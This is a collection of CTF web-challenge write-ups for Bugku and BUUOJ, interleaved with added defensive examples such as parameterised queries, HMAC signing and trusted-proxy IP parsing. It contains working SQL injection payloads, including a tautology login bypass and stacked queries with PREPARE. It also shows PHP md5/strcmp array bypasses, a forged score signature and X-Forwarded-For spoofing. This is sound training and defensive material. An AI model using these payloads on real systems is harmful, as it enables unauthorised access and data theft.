
web1

Bugku-秋名山车神

Send the POST answer back quickly; because of timing precision it may take several attempts.

import requests
import re

url = 'http://114.67.246.176:17516/'
s = requests.Session()
source = s.get(url)
# Pull the arithmetic expression out of the page, e.g. "12+34*5"
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
# The regex only admits digits and + - *, which bounds what eval() is given
result = eval(expression)
post = {'value': result}
# Reuse the same session so the answer arrives within the time window
print(s.post(url, data=post).text)
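The solver above hands a string scraped from a remote server to eval(); the regex keeps that safe here, but the same job can be done without eval() at all. The following is an added example, not code from the writeup: it parses the expression with the ast module and only evaluates integer constants joined by + - *, rejecting anything else. SAMPLE_PAGE is a constructed stand-in for the challenge page, not captured from the site.

```python
import ast
import operator
import re

# Constructed sample of the kind of page body the challenge returns (not a real capture).
SAMPLE_PAGE = "<div>please post the result of 1234+5678*90-12</div>"

# The only binary operators the evaluator will perform.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def extract_expression(page_text):
    """Return the first run of integers joined by + - * found in the page."""
    match = re.search(r'(\d+[+\-*])+(\d+)', page_text)
    if match is None:
        raise ValueError("no arithmetic expression found")
    return match.group()


def _eval_node(node):
    # Accept exactly two node kinds: a permitted BinOp, or an int literal.
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        return _OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.Constant) and isinstance(node.value, int):
        return node.value
    raise ValueError("disallowed syntax: %s" % ast.dump(node))


def safe_eval(expression):
    """Evaluate an integer + - * expression without eval(); anything else raises."""
    tree = ast.parse(expression, mode="eval")
    return _eval_node(tree.body)


def solve(page_text):
    """Extract and evaluate the expression, as the solver would before POSTing."""
    return safe_eval(extract_expression(page_text))


if __name__ == "__main__":
    print(solve(SAMPLE_PAGE))
```

Because the evaluator walks the syntax tree and whitelists node types, inputs such as `2**8` or a function call are rejected with ValueError instead of being executed; the regex stays as a first filter, the AST walk is the real control.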

Bugku-速度要快

View the page source: the server expects a POST with a matching margin value. Capturing the traffic with Burp shows that the response header carries a flag, which has to be base64-decoded twice.

# python = 2.7
import base64
import requests

url = 'http://114.67.246.176:11932'
req = requests.Session()
source = req.get(url)
# First layer: the 'flag' response header is base64
data1 = base64.b64decode(source.headers['flag'])
print(data1)
# Keep only the text after ": " (the decoded header reads "...: <base64>")
data1 = data1[data1.index(":")+2:]
print(data1)
# Second layer
data = base64.b64decode(data1)
print(data)
post = {"margin": data}
# Reuse the same session so the POST arrives within the time limit
ans = req.post(url, data=post)
print ans.content

BUUOJ-[极客大挑战 2019]EasySQL1

A typical login check looks like sql="select * from admin where username="&user&" and password="&pwd&""
Try the universal password: username=1'or 1=1#&password=1
The ' in the username closes the preceding quote, or 1=1 makes the condition always true, and the trailing # comments out the rest of the statement so it does not error.
check.php?username=1%27or%201=1%23&password=1

BugKu game1

Capture the request with Burp:

GET /score.php?score=25&ip=106.39.42.143&sign=zMMjU=== HTTP/1.1
Host: 114.67.246.176:11523
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: */*
Referer: http://114.67.246.176:11523/?s=1631061774862
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.1016401715.1631061825; _gid=GA1.1.1665857216.1631061825; Hm_lvt_c1b044f909411ac4213045f0478e96fc=1631061825; _gat=1; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1631062078
Connection: close

Looking at the relationship between score and sign, the first idea was to base64-decode sign, but it does not decode correctly.

Base64-encoding the score gives MjU=

So sign is the base64 of score with a fixed prefix and suffix added.

Substitute a larger score and add the same prefix and suffix:

GET /score.php?score=4000&ip=106.39.42.143&sign=zMNDAwMA==== HTTP/1.1
Host: 114.67.246.176:11523
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: */*
Referer: http://114.67.246.176:11523/?s=1631061774862?s=1631062331778
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.1016401715.1631061825; _gid=GA1.1.1665857216.1631061825; Hm_lvt_c1b044f909411ac4213045f0478e96fc=1631061825; _gat=1; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1631062340
Connection: close
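The two captures show why the sign parameter protects nothing: it is derived from the score alone with no secret, so anyone who knows the encoding can produce a valid one. The following is an added example, not code from the challenge or the writeup. weak_sign reproduces the observed scheme (prefix zM, base64 of the score, suffix ==) purely to show it is deterministic; hmac_sign and verify show the keyed alternative a server should use. SERVER_KEY and the message layout score|ip are constructed for the example.

```python
import base64
import hashlib
import hmac

# Constructed server-side secret for the example; a real service keeps it in config, not source.
SERVER_KEY = b"example-key-not-from-the-challenge"


def weak_sign(score):
    """The scheme visible in the captures: fixed prefix + base64(score) + fixed suffix.
    There is no secret, so any client can compute it for any score."""
    return "zM" + base64.b64encode(str(score).encode()).decode() + "=="


def hmac_sign(score, ip, key=SERVER_KEY):
    """Keyed MAC over every field the server relies on (here score and ip)."""
    msg = ("%d|%s" % (score, ip)).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def verify(score, ip, sign, key=SERVER_KEY):
    """Constant-time comparison; a sign computed for one score fails for another."""
    return hmac.compare_digest(hmac_sign(score, ip, key), sign)


if __name__ == "__main__":
    client_ip = "106.39.42.143"
    print(weak_sign(25))                           # "zMMjU===", as in the first capture
    good = hmac_sign(25, client_ip)
    print(verify(25, client_ip, good))             # True
    print(verify(4000, client_ip, good))           # False: score changed, MAC no longer matches
```

Even with an HMAC, a score chosen by the client is still a client-chosen number; the stronger design is to compute the score server-side and sign only an opaque game-session identifier.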

Bugku-前女友(php绕过)

Loose type comparison

  • ===: first checks whether the two operands have the same type, then compares their values. (A numeric-looking string beginning with 0e is read as scientific notation, so its numeric value is 0.)
  • ==: first converts both operands to a common type, then compares; when a string is compared with a number, the string is converted to a number.

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>
http://114.67.246.176:11128/?v1=240610708&v2=QNKCDZO&v3[]=1

This uses a property of md5(): when given an array it raises a warning and returns null. So it is enough to make $v1 and $v2 two arrays with different values to pass the check.

http://114.67.246.176:11128/?v1[]=240610708&v2[]=QNKCDZO&v3[]=1

strcmp() compares two strings and returns 0 when they are equal. Before PHP 5.3, passing a non-string such as an array or object raises an error, but the call still returns 0 alongside the error.

Bugku1-login1

SQL constraint attack; see https://www.k0rz3n.com/2017/06/03/passsignup/

<?php
// Checking whether a user with the same username exists
$username = mysql_real_escape_string($_GET['username']);
$password = mysql_real_escape_string($_GET['password']);
$query = "SELECT *
          FROM users
          WHERE username='$username'";
$res = mysql_query($query, $database);
if($res) {
    if(mysql_num_rows($res) > 0) {
        // User exists, exit gracefully
        .
        .
    }
    else {
        // If not, only then insert a new entry
        $query = "INSERT INTO users(username, password)
                  VALUES ('$username','$password')";
        .
        .
    }
}
<?php
$username = mysql_real_escape_string($_GET['username']);
$password = mysql_real_escape_string($_GET['password']);
$query = "SELECT username FROM users
          WHERE username='$username'
          AND password='$password' ";
$res = mysql_query($query, $database);
if($res) {
    if(mysql_num_rows($res) > 0){
        $row = mysql_fetch_assoc($res);
        return $row['username'];
    }
}
return Null;

When SQL compares strings, trailing spaces are discarded: in other words "vampire" is treated as equal to "vampire ", and this holds in the great majority of cases (strings in a WHERE clause, strings in an INSERT statement, and so on).
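The registration code above lets the database decide what a username "is": an over-long value is silently truncated to the column width and a trailing-space variant compares equal to the original, so the existence check and the stored value disagree. The following is an added example, not code from the reference article or the challenge, showing the registration-side checks that close that gap: the application enforces the column length itself, rejects leading or trailing whitespace, and lets a PRIMARY KEY constraint, not a separate SELECT, decide uniqueness. USERNAME_MAX_LEN and the sqlite schema are constructed for the example (sqlite does not truncate, so the point is the validation layer, not the engine).

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed column width; the reference relies on a narrow varchar username column.
USERNAME_MAX_LEN = 25
PBKDF2_ROUNDS = 100_000


def valid_username(username):
    """Refuse anything the database might silently rewrite before storing it:
    over-length values (truncation) and surrounding whitespace (padding equality)."""
    return (
        0 < len(username) <= USERNAME_MAX_LEN
        and username == username.strip()
        and username.isprintable()
    )


def hash_password(password, salt=None):
    """Salted PBKDF2; returns salt || digest so the salt travels with the record."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt + digest


def open_db():
    conn = sqlite3.connect(":memory:")
    # PRIMARY KEY makes "does it already exist?" atomic instead of a racy SELECT-then-INSERT.
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password BLOB NOT NULL)")
    return conn


def register(conn, username, password):
    """True on success; False if the name is rejected or already taken."""
    if not valid_username(username):
        return False
    try:
        conn.execute("INSERT INTO users(username, password) VALUES (?, ?)",
                     (username, hash_password(password)))
    except sqlite3.IntegrityError:
        return False
    return True


def login(conn, username, password):
    row = conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return False
    stored = bytes(row[0])
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    db = open_db()
    print(register(db, "vampire", "correct-horse"))                  # True
    # The constraint-attack shape: real name, padding, then extra characters past the column width.
    print(register(db, "vampire" + " " * 20 + "x", "attacker"))      # False: rejected by length check
    print(register(db, "vampire ", "attacker"))                      # False: trailing space
    print(login(db, "vampire", "attacker"))                          # False
```

With MySQL the same idea applies, plus running the server in strict SQL mode so that an over-long INSERT fails instead of being truncated.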

BUUOJ-[极客大挑战 2019]Havefun1

<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
    echo 'Syc{cat_cat_cat_cat}';
}
-->

BUUOJ-[强网杯 2019]随便注1

# 1' or 1=1 #
array(2) {
[0]=>
string(1) "1"
[1]=>
string(7) "hahahah"
}

array(2) {
[0]=>
string(1) "2"
[1]=>
string(12) "miaomiaomiao"
}

array(2) {
[0]=>
string(6) "114514"
[1]=>
string(2) "ys"
}
# 0';show databases;   stacked injection: list the database names
array(1) {
[0]=>
string(11) "ctftraining"
}

array(1) {
[0]=>
string(18) "information_schema"
}

array(1) {
[0]=>
string(5) "mysql"
}

array(1) {
[0]=>
string(18) "performance_schema"
}

array(1) {
[0]=>
string(9) "supersqli"
}

array(1) {
[0]=>
string(4) "test"
}

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#
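Both the EasySQL1 bypass (a quote plus or 1=1) and the stacked injection here work because the input is pasted into the SQL text and the connector is allowed to run more than one statement. The following is an added example, not code from either challenge: a constructed sqlite copy of the words table shown above, queried once by string concatenation and once with a bound parameter. The comment marker is written as -- because sqlite does not accept MySQL's #; the table contents are the three rows from the output above.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the challenge's words table (the three rows shown above)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE words (id TEXT, data TEXT)")
    conn.executemany("INSERT INTO words VALUES (?, ?)",
                     [("1", "hahahah"), ("2", "miaomiaomiao"), ("114514", "ys")])
    conn.commit()
    return conn


def lookup_concat(conn, user_input):
    """Vulnerable shape: the input becomes part of the SQL text.
    Returns the rows, or an 'error: ...' string if the statement could not run."""
    query = "SELECT * FROM words WHERE id='%s'" % user_input
    try:
        return conn.execute(query).fetchall()
    except (sqlite3.Error, sqlite3.Warning) as exc:
        # sqlite3's execute() refuses a second statement; older versions raise Warning.
        return "error: %s" % exc


def lookup_param(conn, user_input):
    """Fixed shape: SQL and value travel separately, so the value can never become
    syntax, and a single execute() can only ever run one statement."""
    return conn.execute("SELECT * FROM words WHERE id=?", (user_input,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "1' or 1=1 -- "             # EasySQL1 shape, sqlite comment syntax
    stacked = "0'; DROP TABLE words; -- "   # stacked-query shape
    print(lookup_concat(db, tautology))     # all three rows
    print(lookup_concat(db, stacked))       # error: second statement refused
    print(lookup_param(db, tautology))      # []
    print(lookup_param(db, stacked))        # []
    print(lookup_param(db, "114514"))       # [('114514', 'ys')]
```

The PREPARE/concat trick in the payload above is the reason keyword blacklists are not a fix: the statement text can be assembled at runtime inside the database. Binding parameters and using a single-statement API removes the problem at the source rather than trying to recognise the payload.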

The robots protocol

robots.txt is a plain text file that can be created and edited with any common text editor, such as Notepad on Windows. robots.txt is a convention, not a command. It is the first file a search engine checks when visiting a site, and it tells crawlers which files on the server may be viewed.

Spoofing proxy headers

GET / HTTP/1.1
Host: 111.200.241.244:49662
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 123.123.123.123    # fake ip
Referer: https://www.google.com
Content-Length: 360
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
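The request above works because the application reads X-Forwarded-For as if it were the client's address, when in fact any client can write the header. The following is an added example, not code from the writeup: a client_ip() helper that only believes X-Forwarded-For entries appended by the application's own reverse proxies, walking the list from the right and stopping at the first address that is not a known proxy. TRUSTED_PROXIES and all addresses used are constructed for the example.

```python
import ipaddress

# Constructed: the reverse proxies this application sits behind. Only header
# entries appended by these hops are believed.
TRUSTED_PROXIES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("127.0.0.1/32"),
]


def _trusted(ip):
    """True if ip parses and belongs to one of our proxy ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr, xff_header):
    """Derive the client address from the TCP peer and X-Forwarded-For.

    If the peer is not one of our proxies the header was not written by us and
    is ignored. Otherwise walk X-Forwarded-For right to left, dropping our own
    hops; the first non-proxy address is the client. Anything the client itself
    planted further left is never reached."""
    if not _trusted(remote_addr):
        return remote_addr
    hops = [h.strip() for h in (xff_header or "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not _trusted(hop):
            try:
                return str(ipaddress.ip_address(hop))
            except ValueError:
                break  # malformed entry: fall back to the proxy's own address
    return remote_addr


if __name__ == "__main__":
    # Constructed scenarios
    print(client_ip("203.0.113.9", "123.123.123.123"))            # direct hit: header ignored -> 203.0.113.9
    print(client_ip("10.0.0.5", "123.123.123.123, 203.0.113.9"))  # behind our proxy -> 203.0.113.9
    print(client_ip("10.0.0.5", "203.0.113.9, 10.0.0.7"))         # two of our hops -> 203.0.113.9
```

The same reasoning applies to Referer: it is a client-supplied string and must not be used as an access-control decision, only as a hint.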